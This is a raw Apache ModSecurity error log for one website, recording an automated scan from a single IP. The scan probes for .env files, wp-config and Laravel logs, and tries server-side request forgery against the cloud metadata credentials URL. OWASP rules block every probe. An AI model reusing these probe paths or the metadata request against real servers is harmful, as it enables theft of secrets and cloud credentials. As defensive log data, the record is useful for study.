[Tue May 12 05:04:47.260664 2026] [security2:error] [pid 1730175:tid 1730191] [client 45.148.10.42:44996] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/local/.env"] [unique_id "agKYz3o6NvB9WXx5V-6mMwAAAQ4"]
[Tue May 12 05:04:47.260808 2026] [security2:error] [pid 1730175:tid 1730191] [client 45.148.10.42:44996] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/local/.env"] [unique_id "agKYz3o6NvB9WXx5V-6mMwAAAQ4"]
[Tue May 12 05:04:47.270931 2026] [security2:error] [pid 1808852:tid 1808870] [client 45.148.10.42:45002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.env.txt"] [unique_id "agKYzxfeipD4uoG21FopNgAAAA8"]
[Tue May 12 05:04:47.271080 2026] [security2:error] [pid 1808852:tid 1808870] [client 45.148.10.42:45002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.env.txt"] [unique_id "agKYzxfeipD4uoG21FopNgAAAA8"]
[Tue May 12 05:04:47.281020 2026] [security2:error] [pid 1730207:tid 1730228] [client 45.148.10.42:45028] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/backend/.env"] [unique_id "agKYzzue9Sp-pIv_Bb67-wAAAVM"]
[Tue May 12 05:04:47.281163 2026] [security2:error] [pid 1730207:tid 1730228] [client 45.148.10.42:45028] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/backend/.env"] [unique_id "agKYzzue9Sp-pIv_Bb67-wAAAVM"]
[Tue May 12 05:04:47.282412 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.42:44950] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/wp-config.php.txt"] [unique_id "agKYz3o6NvB9WXx5V-6mNQAAAQg"]
[Tue May 12 05:04:47.282547 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.42:44950] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/wp-config.php.txt"] [unique_id "agKYz3o6NvB9WXx5V-6mNQAAAQg"]
[Tue May 12 05:04:47.286535 2026] [security2:error] [pid 1825179:tid 1825222] [client 45.148.10.42:44986] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.env.example"] [unique_id "agKYz9r1yOh9TvizeziXjQAAAFg"]
[Tue May 12 05:04:47.286721 2026] [security2:error] [pid 1825179:tid 1825222] [client 45.148.10.42:44986] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.env.example"] [unique_id "agKYz9r1yOh9TvizeziXjQAAAFg"]
[Tue May 12 05:04:47.292629 2026] [security2:error] [pid 1820198:tid 1820207] [client 45.148.10.42:45054] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/storage/.env"] [unique_id "agKYz81tk6y7yBJLpJoyLwAAAIc"]
[Tue May 12 05:04:47.292788 2026] [security2:error] [pid 1820198:tid 1820207] [client 45.148.10.42:45054] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/storage/.env"] [unique_id "agKYz81tk6y7yBJLpJoyLwAAAIc"]
[Tue May 12 05:04:47.296079 2026] [security2:error] [pid 1730207:tid 1730209] [client 45.148.10.42:44972] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.env.production.local"] [unique_id "agKYzzue9Sp-pIv_Bb67_QAAAUA"]
[Tue May 12 05:04:47.296233 2026] [security2:error] [pid 1730207:tid 1730209] [client 45.148.10.42:44972] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.env.production.local"] [unique_id "agKYzzue9Sp-pIv_Bb67_QAAAUA"]
[Tue May 12 05:04:47.303105 2026] [security2:error] [pid 1730207:tid 1730225] [client 45.148.10.42:45036] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "letamsgarage.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKYzzue9Sp-pIv_Bb67_AAAAVA"]
[Tue May 12 05:04:47.303443 2026] [security2:error] [pid 1730207:tid 1730225] [client 45.148.10.42:45036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKYzzue9Sp-pIv_Bb67_AAAAVA"]
[Tue May 12 05:04:47.905962 2026] [security2:error] [pid 1808852:tid 1808868] [client 45.148.10.42:27594] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYxxfeipD4uoG21FopIgAAAA0"]
[Tue May 12 05:04:50.329851 2026] [security2:error] [pid 1825179:tid 1825203] [client 45.148.10.42:45150] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "letamsgarage.fr"] [uri "/_next/image/"] [unique_id "agKY0tr1yOh9TvizeziXjwAAAEU"]
[Tue May 12 05:04:50.330637 2026] [security2:error] [pid 1825179:tid 1825203] [client 45.148.10.42:45150] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/_next/image/"] [unique_id "agKY0tr1yOh9TvizeziXjwAAAEU"]
[Tue May 12 05:04:51.138148 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.42:27440] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYxxfeipD4uoG21FopIwAAABY"]
[Tue May 12 05:04:53.289149 2026] [security2:error] [pid 1730175:tid 1730198] [client 45.148.10.42:44782] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYyno6NvB9WXx5V-6mKAAAARU"]
[Tue May 12 05:04:53.312543 2026] [security2:error] [pid 1730175:tid 1730183] [client 45.148.10.42:27498] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYx3o6NvB9WXx5V-6mIgAAAQY"]
[Tue May 12 05:04:54.330629 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.42:27418] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYx81tk6y7yBJLpJoyFwAAAIM"]
[Tue May 12 05:04:54.392319 2026] [security2:error] [pid 1825287:tid 1825305] [client 45.148.10.42:18108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.env"] [unique_id "agKY1ggpmE1yW0glLdgmqgAAAME"]
[Tue May 12 05:04:54.392518 2026] [security2:error] [pid 1825287:tid 1825305] [client 45.148.10.42:18108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.env"] [unique_id "agKY1ggpmE1yW0glLdgmqgAAAME"]
[Tue May 12 05:04:54.397082 2026] [security2:error] [pid 1825179:tid 1825207] [client 45.148.10.42:18110] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "letamsgarage.fr"] [uri "/_next/image/"] [unique_id "agKY1tr1yOh9TvizeziXkgAAAEk"]
[Tue May 12 05:04:54.397716 2026] [security2:error] [pid 1825179:tid 1825207] [client 45.148.10.42:18110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/_next/image/"] [unique_id "agKY1tr1yOh9TvizeziXkgAAAEk"]
[Tue May 12 05:04:58.291477 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.42:18152] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKY2s1tk6y7yBJLpJoyNwAAAIU"]
[Tue May 12 05:04:58.291661 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.42:18152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKY2s1tk6y7yBJLpJoyNwAAAIU"]
[Tue May 12 05:04:58.391307 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.42:44888] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYys1tk6y7yBJLpJoyIQAAAJc"]
[Tue May 12 05:05:02.651923 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.42:55136] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.env"] [unique_id "agKY3no6NvB9WXx5V-6mQgAAARY"]
[Tue May 12 05:05:02.652133 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.42:55136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.env"] [unique_id "agKY3no6NvB9WXx5V-6mQgAAARY"]
[Tue May 12 05:05:02.672024 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.42:44854] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYyjue9Sp-pIv_Bb677gAAAVE"]
[Tue May 12 05:05:04.797996 2026] [:error] [pid 1730207:tid 1730223] [client 74.7.243.217:52060] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
[Tue May 12 05:05:05.949351 2026] [security2:error] [pid 1825287:tid 1825313] [client 45.148.10.42:55174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.env"] [unique_id "agKY4QgpmE1yW0glLdgmtgAAAMg"]
[Tue May 12 05:05:05.949556 2026] [security2:error] [pid 1825287:tid 1825313] [client 45.148.10.42:55174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.env"] [unique_id "agKY4QgpmE1yW0glLdgmtgAAAMg"]
[Tue May 12 05:05:07.833081 2026] [security2:error] [pid 1808852:tid 1808879] [client 45.148.10.42:44792] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYyhfeipD4uoG21FopKAAAABg"]
[Tue May 12 05:05:08.463437 2026] [security2:error] [pid 1808852:tid 1808870] [client 45.148.10.42:45002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYzxfeipD4uoG21FopNgAAAA8"]
[Tue May 12 05:05:09.635256 2026] [security2:error] [pid 1730207:tid 1730209] [client 45.148.10.42:44972] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYzzue9Sp-pIv_Bb67_QAAAUA"]
